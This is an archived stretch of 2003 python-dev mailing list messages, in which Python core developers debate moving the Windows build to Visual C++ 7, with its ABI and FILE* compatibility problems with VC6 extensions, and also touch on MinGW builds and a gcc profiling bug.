Sounds to me like the switch to VC7 will have to happen with a long lead
time, similar to what one might expect if Guido decided to deprecate the sys
module. ;-)

Skip


From aleax@aleax.it  Tue May  6 21:12:07 2003
From: aleax@aleax.it (Alex Martelli)
Date: Tue, 6 May 2003 22:12:07 +0200
Subject: [Python-Dev] MS VC 7 offer
In-Reply-To: <007f01c31409$3a5f9670$21795418@dell1700>
References: <007f01c31409$3a5f9670$21795418@dell1700>
Message-ID: <200305062212.07539.aleax@aleax.it>

On Tuesday 06 May 2003 09:53 pm, Brian Quinlan wrote:
> Brian> It's free and more standards compliant.
>
> > Then I suggest we have at least one beta which is built using it.
>
> Don't get me wrong; I think that moving to VC7 for Python 2.3 would be a
> mistake if VC6-compiled extension modules are not binary compatible. My
> understanding was that static libraries are not compatible but that
> dynamic ones are. I spent a few minutes with google but wasn't able to
> find out.

When we discussed VC versions (back when we met in Oxford during
PythonUK/ACCU), David Abrahams seemed adamant that VC7 and VC6
are indeed compatible -- as he has first-hand experience while I just have
horror stories from ex-coworkers, I suspect he's likelier to be right.  Anyway,
I'm CC'ing him since I do suspect he has relevant input and might not
be following python-dev right now...


Alex



From martin@v.loewis.de  Tue May  6 21:22:26 2003
From: martin@v.loewis.de (=?ISO-8859-1?Q?=22Martin_v=2E_L=F6wis=22?=)
Date: Tue, 06 May 2003 22:22:26 +0200
Subject: [Python-Dev] MS VC 7 offer
In-Reply-To: <007f01c31409$3a5f9670$21795418@dell1700>
References: <007f01c31409$3a5f9670$21795418@dell1700>
Message-ID: <3EB81982.8070600@v.loewis.de>

Brian Quinlan wrote:
> Don't get me wrong; I think that moving to VC7 for Python 2.3 would be a
> mistake if VC6-compiled extension modules are not binary compatible. My
> understanding was that static libraries are not compatible but that
> dynamic ones are. I spent a few minutes with google but wasn't able to
> find out.

Please rest assured that they are definitely incompatible. People have
been trying to combine VC7 extension modules with VC6, and got 
consistent crashes. The crashes occur as you pass FILE* across 
libraries: Neither C library can deal with FILE* (such as stdout)
received from the other library.

> 1. 3rd party extension developers will have to switch very quickly to be
> 
>    ready for the 2.3 release

True.

> 2. Some 3rd party extension developers may have already released 
>    binaries for Python 2.3, based on the understanding that there won't 
>    be any additional API changes after the first beta (barring a 
>    disaster). 

There won't be any.  That's an ABI change, not an API change.

> 3. I believe that the installer normally preserves site-packages when
>    doing an upgrade? If so, the user is going to be left with extension
>    modules that won't work.

Users installing betas should still expect such things. Uninstallation
before upgrading to the final release is strongly advised.

Regards,
Martin



From guido@python.org  Tue May  6 21:23:18 2003
From: guido@python.org (Guido van Rossum)
Date: Tue, 06 May 2003 16:23:18 -0400
Subject: [Python-Dev] MS VC 7 offer
In-Reply-To: Your message of "Tue, 06 May 2003 22:12:07 +0200."
 <200305062212.07539.aleax@aleax.it>
References: <007f01c31409$3a5f9670$21795418@dell1700>
 <200305062212.07539.aleax@aleax.it>
Message-ID: <200305062023.h46KNI907721@odiug.zope.com>

I should mention that on re-reading Nick's email, it's clear that he's
offering to donate copies of Visual C++ 2003, so that's the latest.
I've invited him to respond directly to the comments and questions.

In any case, it looks like it may be best to wait until after 2.3 is
released, although if there's time I wouldn't mind playing a bit with
2003.  (Hmm... if it really doesn't work on Win98 I have a problem.)

--Guido van Rossum (home page: http://www.python.org/~guido/)


From martin@v.loewis.de  Tue May  6 21:26:51 2003
From: martin@v.loewis.de (=?ISO-8859-1?Q?=22Martin_v=2E_L=F6wis=22?=)
Date: Tue, 06 May 2003 22:26:51 +0200
Subject: [Python-Dev] MS VC 7 offer
In-Reply-To: <200305062212.07539.aleax@aleax.it>
References: <007f01c31409$3a5f9670$21795418@dell1700> <200305062212.07539.aleax@aleax.it>
Message-ID: <3EB81A8B.9090603@v.loewis.de>

Alex Martelli wrote:

> When we discussed VC versions (back when we met in Ofxord during
> PythonUK/ACCU), David Abrahams seemed adamant that VC7 and VC6
> are indeed compatible

I doubt he said this in this generality: he surely knows that you
cannot mix C++ object files on the object file level between those
compilers, as they implement completely different ABIs.

For Python, the biggest problem is that you cannot pass FILE* from one C 
library to the other, because of some stupid locking test in the C 
library. This does cause crashes when you try to use Python extension 
modules compiled with the wrong compiler.

Regards,
Martin



From aleax@aleax.it  Tue May  6 21:34:12 2003
From: aleax@aleax.it (Alex Martelli)
Date: Tue, 6 May 2003 22:34:12 +0200
Subject: [Python-Dev] MS VC 7 offer
In-Reply-To: <200305062023.h46KNI907721@odiug.zope.com>
References: <007f01c31409$3a5f9670$21795418@dell1700> <200305062212.07539.aleax@aleax.it> <200305062023.h46KNI907721@odiug.zope.com>
Message-ID: <200305062234.12363.aleax@aleax.it>

On Tuesday 06 May 2003 10:23 pm, Guido van Rossum wrote:
> I should mention that on re-reading Nick's email, it's clear that he's
> offering to donate copies of Visual C++ 2003, so that's the latest.
> I've invited him to respond directly to the comments and questions.
>
> In any case, it looks like it may be best to wait until after 2.3 is
> released, although if there's time I wouldn't mind playing a bit with
> 2003.  (Hmm... if it really doesn't work on Win98 I have a problem.)

Me too -- a BAD one, since I do just about all of my "windows" work
these days with win4lin under Linux on my desktop box (cheap, fast,
convenient), or on an old Acer Travelmate 345T laptop, and both only
support Win98 -- the only "modern" Windows version I have around is
in the dualboot of a far-too-heavy Dell laptop which came with Win/XP
(so I didn't entirely remove it when installing Linux as the main OS, just
shrank it as much as I could in case I ever needed something in it)...

It WOULD be deucedly inconvenient to have to install Win/XP and keep
it booted just to be able to build Python extension binaries for Windows...!-(

Why a command-line compiler shouldn't be able to run on just about any
version of its OS really escapes me.  Maybe a clever move to force us
laggards to upgrade whether we want to or not...?-(


Alex



From skip@pobox.com  Tue May  6 21:50:31 2003
From: skip@pobox.com (Skip Montanaro)
Date: Tue, 6 May 2003 15:50:31 -0500
Subject: [Python-Dev] bsddb185 module changes checked in
Message-ID: <16056.8215.274307.904009@montanaro.dyndns.org>

The various bits necessary to implement the "build bsddb185 when
appropriate" have been checked in.  I'm pretty sure I don't have the best
possible test for the existence of a db library, but it will have to do for
now.  I suspect others can clean it up later during the beta cycle.  The
current detection code in setup.py should work for Nick on OSF/1 and for
platforms which don't require a separate db library.

I'd appreciate some extra pounding on this code.

Thanks,

Skip


From tim.one@comcast.net  Tue May  6 21:50:18 2003
From: tim.one@comcast.net (Tim Peters)
Date: Tue, 06 May 2003 16:50:18 -0400
Subject: [Python-Dev] MS VC 7 offer
In-Reply-To: <3EB81A8B.9090603@v.loewis.de>
Message-ID: <BIEJKCLHCIOIHAGOKOLHOEIPFJAA.tim.one@comcast.net>

[Alex Martelli]
> When we discussed VC versions (back when we met in Ofxord during
> PythonUK/ACCU), David Abrahams seemed adamant that VC7 and VC6
> are indeed compatible

[Martin v. Lowis]
> I doubt he said this in this generality: he surely knows that you
> cannot mix C++ object files on the object file level between those
> compilers, as they implement completely different ABIs.
>
> For Python, the biggest problem is that you cannot pass FILE* from one C
> library to the other, because of some stupid locking test in the C
> library. This does cause crashes when you try to use Python extension
> modules compiled with the wrong compiler.

And not the only problem.  Review the "PyObject_New vs PyObject_NEW" thread
from python-dev in March.  This snippet sums it up:

    [David Abrahams]
    > Python was compiled with vc6, the rest with vc7.  I test this
    > combination regularly and have never seen a problem.

    [Tim]
    You have now <wink>.



From brian@sweetapp.com  Tue May  6 22:15:35 2003
From: brian@sweetapp.com (Brian Quinlan)
Date: Tue, 06 May 2003 14:15:35 -0700
Subject: [Python-Dev] MS VC 7 offer
In-Reply-To: <3EB81982.8070600@v.loewis.de>
Message-ID: <008601c31414$a26d0120$21795418@dell1700>

> Please rest assured that they are definitely incompatible. People have
> been trying to combine VC7 extension modules with VC6, and got
> consistent crashes. The crashes occur as you pass FILE* across
> libraries: Neither C library can deal with FILE* (such as stdout)
> received from the other library.

Wouldn't this only affect extension modules using PyFile_FromFile and
PyFile_AsFile? And a little hackery could make those routines generate
exceptions if called from an incompatible VC version.

> > 2. Some 3rd party extension developers may have already released
> >    binaries for Python 2.3, based on the understanding that there 
> >    won't be any additional API changes after the first beta (baring
> >    a disaster).
> 
> There won't be any. That's any ABI change.

Isn't the ABI dependent on the API and linker? The API is supposed to be
stable at this point. I would imagine that most extension developers
would assume that the build environment is also stable at this point.

Cheers,
Brian



From jepler@unpythonic.net  Tue May  6 21:57:33 2003
From: jepler@unpythonic.net (Jeff Epler)
Date: Tue, 6 May 2003 15:57:33 -0500
Subject: RedHat 9 _random failure under -pg (was Re: [Python-Dev] Startup time)
In-Reply-To: <m3llxj6fof.fsf@mira.informatik.hu-berlin.de>
References: <20030506185750.GB27125@unpythonic.net> <m3llxj6fof.fsf@mira.informatik.hu-berlin.de>
Message-ID: <20030506205733.GE27125@unpythonic.net>

On Tue, May 06, 2003 at 09:25:20PM +0200, Martin v. Löwis wrote:
> Jeff Epler <jepler@unpythonic.net> writes:
> 
> > Well, this may have been false alarm -- when I removed -pg from OPT in
> > the Makefile, './python -c "import random"' works.  So this is a problem
> > only when profiling is enabled.  Is this intended to work?
> 
> You mean, is the gcc option -pg supposed to work? As a Python
> developer: How am I supposed to know? As a gcc developer: yes,
> certainly.

I didn't know you were a gcc developer.

In any case, I've distilled this down to a small testcase and was working
on preparing a bug report for their gnats database.  The testcase is
about as simple as it gets:
    /* compile with -pg -fPIC -O */
    typedef struct { void *(*f)(void *, int); } T;
    void *g(T *t) { return t->f(t, 0); }
however, I checked 3.2.3 and this bug is fixed, so I guess I don't need
to do that.

Jeff


From lists@morpheus.demon.co.uk  Tue May  6 22:19:31 2003
From: lists@morpheus.demon.co.uk (Paul Moore)
Date: Tue, 06 May 2003 22:19:31 +0100
Subject: [Python-Dev] MS VC 7 offer
References: <Pine.LNX.4.44.0305061347360.3480-100000@oblivion.cathoderaymission.net> <200305061901.h46J11306259@odiug.zope.com>
Message-ID: <n2m-g.ptmvn57g.fsf@morpheus.demon.co.uk>

Guido van Rossum <guido@python.org> writes:

>> Visual Studio 2003 came out a few weeks ago.  I honestly don't know if 
>> it's considered VC8 or just VC7.1 with the same backend compilers.  But if 
>> you're going to upgrade, you might as well go all the way.
>
> Good question.
>
>> Also, I'm assuming 2.3 will still be compiled on 6.0, right?
>
> Hm, I was thinking that 2.3 final could be built using 7.x if Nick can
> get us the donated copies fast enough.

If this means that those of us with VC6, and with no plans/reasons to
upgrade can no longer build our own extensions, this would be a
disaster.

Surely VC7-compiled C programs can be built in such a way as to be
link-compatible with VC6-compiled extensions??? (Wait, this is
Microsoft...)

Please *don't* build 2.3 final with VC7. If you're going to switch,
give users more warning, and test builds - I would need at least to
find out if I could build extensions against a VC7-compiled Python
using mingw...

Paul.
-- 
This signature intentionally left blank


From lists@morpheus.demon.co.uk  Tue May  6 22:20:32 2003
From: lists@morpheus.demon.co.uk (Paul Moore)
Date: Tue, 06 May 2003 22:20:32 +0100
Subject: [Python-Dev] MS VC 7 offer
References: <200305061948.03757.phil@riverbankcomputing.co.uk> <BIEJKCLHCIOIHAGOKOLHCEIAFJAA.tim.one@comcast.net>
Message-ID: <n2m-g.n0hzn55r.fsf@morpheus.demon.co.uk>

Tim Peters <tim.one@comcast.net> writes:

> [Phil Thompson]
>> How do we get hold of the free VC 7 compilers?
>
> Part of the 100+ MB .NET Framework 1.1 SDK:
>
> http://www.msdn.microsoft.com/netframework/downloads/howtoget.aspx
>
> Note that this requires Win2K minimum.

Note that these have no optimiser, as I understand it.

Paul.
-- 
This signature intentionally left blank


From martin@v.loewis.de  Tue May  6 22:45:28 2003
From: martin@v.loewis.de (=?ISO-8859-1?Q?=22Martin_v=2E_L=F6wis=22?=)
Date: Tue, 06 May 2003 23:45:28 +0200
Subject: [Python-Dev] MS VC 7 offer
In-Reply-To: <008601c31414$a26d0120$21795418@dell1700>
References: <008601c31414$a26d0120$21795418@dell1700>
Message-ID: <3EB82CF8.4030005@v.loewis.de>

Brian Quinlan wrote:

> Wouldn't this only affect extension modules using PyFile_FromFile and
> PyFile_AsFile? 

That might be the case. However, notice that there might be other 
incompatibilities which we might discover by chance only - Microsoft 
hasn't documented any of this.

>>There won't be any.  That's an ABI change, not an API change.
> 
> 
> Isn't the ABI dependent on the API and linker? 

And the compiler, and the operating system, and the microprocessor.


> The API is supposed to be
> stable at this point. I would imagine that most extension developers
> would assume that the build environment is also stable at this point.

Yes, some are certainly assuming that. Some are sincerely hoping,
or even expecting, that Python 2.3 is released with VC7, so that they 
can embed Python in their VC7-based application without having to 
recompile it.

No matter what the choice is, somebody will be unhappy.

Regards,
Martin




From dave@boost-consulting.com  Tue May  6 23:01:28 2003
From: dave@boost-consulting.com (David Abrahams)
Date: Tue, 06 May 2003 18:01:28 -0400
Subject: [Python-Dev] MS VC 7 offer
In-Reply-To: <3EB81A8B.9090603@v.loewis.de> (Martin v.
 =?iso-8859-1?q?L=F6wis's?= message of "Tue, 06 May 2003 22:26:51 +0200")
References: <007f01c31409$3a5f9670$21795418@dell1700>
 <200305062212.07539.aleax@aleax.it> <3EB81A8B.9090603@v.loewis.de>
Message-ID: <u65on20qv.fsf@boost-consulting.com>

"Martin v. Löwis" <martin@v.loewis.de> writes:

> Alex Martelli wrote:
>
>> When we discussed VC versions (back when we met in Ofxord during
>> PythonUK/ACCU), David Abrahams seemed adamant that VC7 and VC6
>> are indeed compatible
>
> I doubt he said this in this generality

Actually, I did.  I may have overstated the case slightly, but not by
much.

> he surely knows that you cannot mix C++ objects files on the object
> file level between those compilers, as they implement completely
> different ABIs.

They implement substantially similar ABIs.  Here are the facts in
full, glorious/gory detail from a member of Microsoft's compiler team.
I quote:

    The bottom line: the ABI is backwards compatible.

    We do require using the linker that matches the newest compiler
    used in a set of .obj files.

    There were some incompatible name decoration changes (function
    templates) b/w VC7 and VC7.1.  Most people should never notice
    this one, though I know of at least 1 customer that did.

    Another name decoration change was made b/w VC6 and VC7, but
    nobody should notice that change, since they were hitting a broken
    construct anyway.

    There was a SP of VC6 that is incompatible with VC7 and other
    builds of VC6, I forget which exactly, maybe SP4, or maybe it was
    the processor pack.  It only involved pointer to members, but we
    were layout incompatible.

    The only other issues I can think of are related to
    __declspec(align(N)) and __unaligned (IA64 only, really.)

> For Python, the biggest problem is that you cannot pass FILE* from
> one C library to the other, because of some stupid locking test in
> the C library. This does cause crashes when you try to use Python
> extension modules compiled with the wrong compiler.

Assuming you are passing FILE*s across the extension
module boundary and the extension module author is using the VC7
libraries instead of those that ship with VC6 (using the VC6 libraries
with VC7 would be a trick)... then yes.

In practice, making sure that resources are only used by the
appropriate 'C' library is not too difficult, but requires a level of
attention that I wouldn't want to demand of newbies.  I certainly
build all kinds of Boost.Python extension modules with VC7 and test
them without problems using a VC6 build of Python.

HTH,
-- 
Dave Abrahams
Boost Consulting
www.boost-consulting.com



From guido@python.org  Tue May  6 23:06:11 2003
From: guido@python.org (Guido van Rossum)
Date: Tue, 06 May 2003 18:06:11 -0400
Subject: [Python-Dev] MS VC 7 offer
In-Reply-To: Your message of "Tue, 06 May 2003 22:19:31 BST."
 <n2m-g.ptmvn57g.fsf@morpheus.demon.co.uk>
References: <Pine.LNX.4.44.0305061347360.3480-100000@oblivion.cathoderaymission.net> <200305061901.h46J11306259@odiug.zope.com>
 <n2m-g.ptmvn57g.fsf@morpheus.demon.co.uk>
Message-ID: <200305062206.h46M6BP08306@odiug.zope.com>

> If this means that those of us with VC6, and with no plans/reasons to
> upgrade can no longer build our own extensions, this would be a
> disaster.

Part of the offer was:

| Potentially we can even figure out how to enable anyone to
| build Python using the freely downloadable compilers I mentioned
| above...

--Guido van Rossum (home page: http://www.python.org/~guido/)


From martin@v.loewis.de  Tue May  6 23:17:14 2003
From: martin@v.loewis.de (=?ISO-8859-1?Q?=22Martin_v=2E_L=F6wis=22?=)
Date: Wed, 07 May 2003 00:17:14 +0200
Subject: [Python-Dev] MS VC 7 offer
In-Reply-To: <n2m-g.ptmvn57g.fsf@morpheus.demon.co.uk>
References: <Pine.LNX.4.44.0305061347360.3480-100000@oblivion.cathoderaymission.net> <200305061901.h46J11306259@odiug.zope.com> <n2m-g.ptmvn57g.fsf@morpheus.demon.co.uk>
Message-ID: <3EB8346A.1000907@v.loewis.de>

Paul Moore wrote:
> If this means that those of us with VC6, and with no plans/reasons to
> upgrade can no longer build our own extensions, this would be a
> disaster.

Using VC7 would be a disaster for those required to use VC6. Using VC6 
is a disaster for those required to use VC7. Somebody will be unhappy.

> Surely VC7-compiled C programs can be built in such a way as to be
> link-compatible with VC6-compiled extensions??? 

It probably works in many cases, but it is known to fail in certain cases.

Regards,
Martin



From tim.one@comcast.net  Tue May  6 23:17:22 2003
From: tim.one@comcast.net (Tim Peters)
Date: Tue, 06 May 2003 18:17:22 -0400
Subject: [Python-Dev] MS VC 7 offer
In-Reply-To: <3EB82CF8.4030005@v.loewis.de>
Message-ID: <BIEJKCLHCIOIHAGOKOLHEEJKFJAA.tim.one@comcast.net>

[Martin v. Lowis]
> ...
> Some are sincerely hoping, or even expecting, that Python 2.3 is
> released with VC7, so that they can embed Python in their VC7-based
> application without having to recompile it.
>
> No matter what the choice is, somebody will be unhappy.

OTOH, I don't see anything to stop releasing VC6 and VC7 versions of Python,
except for the absence of a volunteer to do it.  While the Wise installer is
proprietary, there's nothing hidden about what goes into a release, there
are several free installers people *could* use instead, and the build
process for the 3rd-party components is pretty exhaustively documented.

Speaking of which, presumably Tcl/Tk, SSL, etc. on Windows should also
be compiled under VC7 then.



From cnetzer@mail.arc.nasa.gov  Tue May  6 23:37:30 2003
From: cnetzer@mail.arc.nasa.gov (Chad Netzer)
Date: 06 May 2003 15:37:30 -0700
Subject: [Python-Dev] MS VC 7 offer
In-Reply-To: <200305062206.h46M6BP08306@odiug.zope.com>
References: <Pine.LNX.4.44.0305061347360.3480-100000@oblivion.cathoderaymission.net>
 <200305061901.h46J11306259@odiug.zope.com>
 <n2m-g.ptmvn57g.fsf@morpheus.demon.co.uk>
 <200305062206.h46M6BP08306@odiug.zope.com>
Message-ID: <1052260650.529.14.camel@sayge.arc.nasa.gov>

On Tue, 2003-05-06 at 15:06, Guido van Rossum wrote:

> Part of the offer was:
> 
> | Potentially we can even figure out how to enable anyone to
> | build Python using the freely downloadable compilers I mentioned
> | above...

Which would seem to exclude building on Win98 machines (or WinME
*snort*, or even Win NT 4).  Those platforms still have a huge installed
base, and I would assume a not insignificant developer base.

Is offering a MSVC6 version along with a more recent compiler version an
option?

-- 

Chad Netzer
(any opinion expressed is my own and not NASA's or my employer's)



From martin@v.loewis.de  Tue May  6 23:47:01 2003
From: martin@v.loewis.de (=?ISO-8859-1?Q?=22Martin_v=2E_L=F6wis=22?=)
Date: Wed, 07 May 2003 00:47:01 +0200
Subject: [Python-Dev] MS VC 7 offer
In-Reply-To: <u65on20qv.fsf@boost-consulting.com>
References: <007f01c31409$3a5f9670$21795418@dell1700>	<200305062212.07539.aleax@aleax.it> <3EB81A8B.9090603@v.loewis.de> <u65on20qv.fsf@boost-consulting.com>
Message-ID: <3EB83B65.8070900@v.loewis.de>

David Abrahams wrote:

> Actually, I did.  I may have overstated the case slightly, but not by
> much.

Hmm. While this is certainly off-topic for python-dev, I'm still 
curious. So I just did this:

1. Create a library project with VC6. Put a single class into
    a single translation unit

#include <afx.h>

struct X:public CObject{
    X();
};

2. Compile this library with vc6.

3. Create an MFC application with VC7. Instantiate X somewhere.
    Try to link. This gives the error message

LINK : fatal error LNK1104: cannot open file 'mfc42d.lib'

Sure enough, VC7 does not come with that library.
So it seems very clear to me that the libraries shipped are
incompatible in a way that does not allow mixing object files
of different compilers. Did I do something wrong here?

Regards,
Martin




From martin@v.loewis.de  Tue May  6 23:50:44 2003
From: martin@v.loewis.de (=?ISO-8859-1?Q?=22Martin_v=2E_L=F6wis=22?=)
Date: Wed, 07 May 2003 00:50:44 +0200
Subject: [Python-Dev] MS VC 7 offer
In-Reply-To: <BIEJKCLHCIOIHAGOKOLHEEJKFJAA.tim.one@comcast.net>
References: <BIEJKCLHCIOIHAGOKOLHEEJKFJAA.tim.one@comcast.net>
Message-ID: <3EB83C44.20706@v.loewis.de>

Tim Peters wrote:

> Speaking of which, presumably Tcl/Tk and SSL and etc on Windows should also
> be compiled under VC7 then.

That is certainly the case (not to forget bsddb, zlib, and bzip2).
This will require quite some volunteer time.

Regards,
Martin




From dave@boost-consulting.com  Wed May  7 00:05:41 2003
From: dave@boost-consulting.com (David Abrahams)
Date: Tue, 06 May 2003 19:05:41 -0400
Subject: [Python-Dev] MS VC 7 offer
In-Reply-To: <3EB83B65.8070900@v.loewis.de> (Martin v.
 =?iso-8859-1?q?L=F6wis's?= message of "Wed, 07 May 2003 00:47:01 +0200")
References: <007f01c31409$3a5f9670$21795418@dell1700>
 <200305062212.07539.aleax@aleax.it> <3EB81A8B.9090603@v.loewis.de>
 <u65on20qv.fsf@boost-consulting.com> <3EB83B65.8070900@v.loewis.de>
Message-ID: <un0hzznei.fsf@boost-consulting.com>

"Martin v. Löwis" <martin@v.loewis.de> writes:

> David Abrahams wrote:
>
>> Actually, I did.  I may have overstated the case slightly, but not by
>> much.
>
> Hmm. While this is certainly off-topic for python-dev, I'm still
> curious. So I just did this:
>
> 1. Create a library project with VC6. Put a single class into
>     a single translation unit
>
> #include <afx.h>
>
> struct X:public CObject{
>     X();
> };
>
> 2. Compile this library with vc6.
>
> 3. Create an MFC application with VC7. Instantiate X somewhere.
>     Try to link. This gives the error message
>
> LINK : fatal error LNK1104: cannot open file 'mfc42d.lib'
>
> Sure enough, VC7 does not come with that library.
> So it seems very clear to me that the libraries shipped are
> incompatible in a way that does not allow to mix object files
> of different compilers. Did I do something wrong here?

I normally don't think of the contents (or naming) of a non-standard
library like MFC that just happens to ship with the compiler as being
something that affects object-code compatibility.  *If* you accept the
way I see that term, your test doesn't say anything about it.
Certainly for any accepted definition of "ABI", it's hard to connect
your test with the claim that "they implement completely different
ABIs".

You could make a reasonable argument that differences in the standard
'C' or C++ library affect object code compatibility; frankly I have
avoided that area so I don't know whether there are problems with the
'C' library but I know the C++ library underwent a major overhaul, so
I wouldn't place any bets.

Regardless, when I say "object code compatibility", I'm talking about
what's traditionally thought of as the ABI: the layout of objects,
calling convention, mechanics of the runtime, etc., all of which are
basically library-independent issues.

HTH2,
-- 
Dave Abrahams
Boost Consulting
www.boost-consulting.com



From mhammond@skippinet.com.au  Wed May  7 00:06:38 2003
From: mhammond@skippinet.com.au (Mark Hammond)
Date: Wed, 7 May 2003 09:06:38 +1000
Subject: [Python-Dev] MS VC 7 offer
In-Reply-To: <200305061826.h46IQ7605750@odiug.zope.com>
Message-ID: <03dc01c31424$26758500$530f8490@eden>

[Guido]

> I can see advantages and disadvantages of moving to VC 7; I'm sure the
> VC 7 compiler is more standard-compliant and generates faster code,
> but a disadvantage is that you can't apparently link binaries built
> with VC 6 to a program built with VC 7, meaning that 3rd party
> extensions will have to be recompiled with VC 7 as well.

Actually, I think this need not be true.  I have MSVC7, not currently
installed, but when it was I did manage to mix and match compilers for
Python and extensions without problem.

I am happy to play with this, but am short on time for a week or so.

Another thing to consider is the "make" environment.  If we don't use
DevStudio, then presumably our existing project files will become useless.
Not a huge problem, but a real one.  MSVC exported makefiles are not
designed to be maintained.  I'm having good success with autoconf and Python
on other projects, but that would raise the barrier by requiring cygwin in
your build environment.

Then-just-one-step-from-gcc <wink> ly,

Mark.



From mhammond@skippinet.com.au  Wed May  7 00:19:50 2003
From: mhammond@skippinet.com.au (Mark Hammond)
Date: Wed, 7 May 2003 09:19:50 +1000
Subject: [Python-Dev] MS VC 7 offer
In-Reply-To: <3EB83B65.8070900@v.loewis.de>
Message-ID: <03e201c31425$feeb3a00$530f8490@eden>

> > Actually, I did.  I may have overstated the case slightly,
> but not by
> > much.
>
> Hmm. While this is certainly off-topic for python-dev, I'm still
> curious. So I just did this:

What you did is to create a library using a specific version of an
"external" library (MFC - shipped by MS as part of MSVC, but as external
as any other .lib you may use from anywhere).

You then upgraded to a newer version of the library and attempted to link
code built using an earlier one.

So this has nothing to do with MSVC as such, only with MFC.  It is somewhat
similar to trying to use a Python 1.x extension with Python 2.x, or,
assuming it was possible, using the same MSVCx with 2 discrete MFC versions.

Mark.



From phil@riverbankcomputing.co.uk  Wed May  7 00:46:06 2003
From: phil@riverbankcomputing.co.uk (Phil Thompson)
Date: Wed, 7 May 2003 00:46:06 +0100
Subject: [Python-Dev] MS VC 7 offer
In-Reply-To: <BIEJKCLHCIOIHAGOKOLHCEIAFJAA.tim.one@comcast.net>
References: <BIEJKCLHCIOIHAGOKOLHCEIAFJAA.tim.one@comcast.net>
Message-ID: <200305070046.06725.phil@riverbankcomputing.co.uk>

On Tuesday 06 May 2003 7:56 pm, Tim Peters wrote:
> [Phil Thompson]
>
> > How do we get hold of the free VC 7 compilers?
>
> Part of the 100+ MB .NET Framework 1.1 SDK:
>
> http://www.msdn.microsoft.com/netframework/downloads/howtoget.aspx
>
> Note that this requires Win2K minimum.

Does it generate binaries that will run under Win9x?

Phil


From pje@telecommunity.com  Wed May  7 00:52:39 2003
From: pje@telecommunity.com (Phillip J. Eby)
Date: Tue, 06 May 2003 19:52:39 -0400
Subject: [Python-Dev] MS VC 7 offer
In-Reply-To: <03dc01c31424$26758500$530f8490@eden>
References: <200305061826.h46IQ7605750@odiug.zope.com>
Message-ID: <5.1.1.6.0.20030506194806.01fc05b0@telecommunity.com>

At 09:06 AM 5/7/03 +1000, Mark Hammond wrote:
>Another thing to consider is the "make" environment.  If we don't use
>DevStudio, then presumably our existing project files will become useless.
>Not a huge problem, but a real one.  MSVC exported makefiles are not
>designed to be maintained.  I'm having good success with autoconf and Python
>on other projects, but that would raise the barrier to including cygwin in
>your build environment.
>
>Then-just-one-step-from-gcc <wink> ly,

Just out of curiosity, what is it that MSVC adds to the picture over gcc 
anyway?  Has anybody ever tried making a MinGW-only build of Python on Windows?



From phil@riverbankcomputing.co.uk  Wed May  7 00:57:10 2003
From: phil@riverbankcomputing.co.uk (Phil Thompson)
Date: Wed, 7 May 2003 00:57:10 +0100
Subject: [Python-Dev] MS VC 7 offer
In-Reply-To: <007e01c31405$1ea52fc0$21795418@dell1700>
References: <007e01c31405$1ea52fc0$21795418@dell1700>
Message-ID: <200305070057.10872.phil@riverbankcomputing.co.uk>

On Tuesday 06 May 2003 8:24 pm, Brian Quinlan wrote:
> > I can see the downside (next to no experience with 7.x, and perhaps
>
> none
>
> > before the final release).  What's the upside?
>
> It's free and more standards compliant.

This is what I'm struggling with.

If it's free, why pay any attention to the offer of a donation of a GUI 
frontend? (With a certain amount of irony, I don't attach any value to a GUI 
frontend to a compiler.)

If it is free using some Microsoft definition of the word (e.g. users have to 
upgrade to Win2K, or some other "read the small print" reason) then my vote 
is -1.

If it is really free then submit a PEP and factor it in to the normal 
review/development process.

I don't understand the apparent urgency.

Phil


From mhammond@skippinet.com.au  Wed May  7 01:08:25 2003
From: mhammond@skippinet.com.au (Mark Hammond)
Date: Wed, 7 May 2003 10:08:25 +1000
Subject: [Python-Dev] MS VC 7 offer
In-Reply-To: <5.1.1.6.0.20030506194806.01fc05b0@telecommunity.com>
Message-ID: <03f801c3142c$c8603290$530f8490@eden>

> Just out of curiosity, what is it that MSVC adds to the
> picture over gcc
> anyway?  Has anybody ever tried making a MinGW-only build of
> Python on Windows?

Now or then? <wink>.  "Then" it was the simple matter of no gcc available
for Windows.  Now, it is a combination of no one driving it, and the simple
fact that msvc will almost certainly generate better code and work with
almost every library on Windows worth talking to.  However, until the "no
one driving it" part is solved, the latter, including the impact of mingw,
won't be able to be measured.

Mark.



From gh@ghaering.de  Wed May  7 01:31:04 2003
From: gh@ghaering.de (Gerhard Häring)
Date: Wed, 07 May 2003 02:31:04 +0200
Subject: [Python-Dev] MS VC 7 offer
In-Reply-To: <5.1.1.6.0.20030506194806.01fc05b0@telecommunity.com>
References: <200305061826.h46IQ7605750@odiug.zope.com>
 <5.1.1.6.0.20030506194806.01fc05b0@telecommunity.com>
Message-ID: <3EB853C8.70100@ghaering.de>

Phillip J. Eby wrote:
> Just out of curiosity, what is it that MSVC adds to the picture over gcc 
> anyway?  Has anybody ever tried making a MinGW-only build of Python on 
> Windows?

I'm working (as time and enthusiasm permit) on making this happen. For 
this project, I was even granted commit privileges by the powers that be :-)

Getting as far as:

C:\src\python\dist\src>python
'import site' failed; use -v for traceback
Python 2.3a2+ (#27, Apr 23 2003, 21:13:49)
[GCC 3.2.2 (mingw special 20030208-1)] on mingw32_nt-5.11
Type "help", "copyright", "credits" or "license" for more information.
 >>>

isn't much of a problem. This is a statically linked python.exe built 
with the autoconf-based build process, msys, mingw and my patches, 
mostly for posixmodule.c.

The difficult part is figuring out the autoconf stuff and distutils, so 
that the rest of the modules can be built. I didn't get very far on this 
side, yet :-/

<OT>
OTOH I'm pretty sure that a mingw build would be much easier if I just 
wrote my own Makefiles, but that's probably unlikely to ever be merged. 
At least that was my experience when making PostgreSQL's client code 
compile with mingw.

Their answer was "we don't want to maintain yet another set of 
proprietary Makefiles", which is a good argument.
</OT>

-- Gerhard


From tim.one@comcast.net  Wed May  7 01:43:59 2003
From: tim.one@comcast.net (Tim Peters)
Date: Tue, 06 May 2003 20:43:59 -0400
Subject: [Python-Dev] MS VC 7 offer
In-Reply-To: <200305070046.06725.phil@riverbankcomputing.co.uk>
Message-ID: <LNBBLJKPBEHFEDALKOLCEEBMEFAB.tim.one@comcast.net>

[Phil Thompson, on
  http://www.msdn.microsoft.com/netframework/downloads/howtoget.aspx
]

Follow the link, please.  I haven't tried it myself, and you've already
proved you can read too <wink>.



From skip@pobox.com  Wed May  7 01:52:13 2003
From: skip@pobox.com (Skip Montanaro)
Date: Tue, 6 May 2003 19:52:13 -0500
Subject: [Python-Dev] MS VC 7 offer
In-Reply-To: <3EB853C8.70100@ghaering.de>
References: <200305061826.h46IQ7605750@odiug.zope.com>
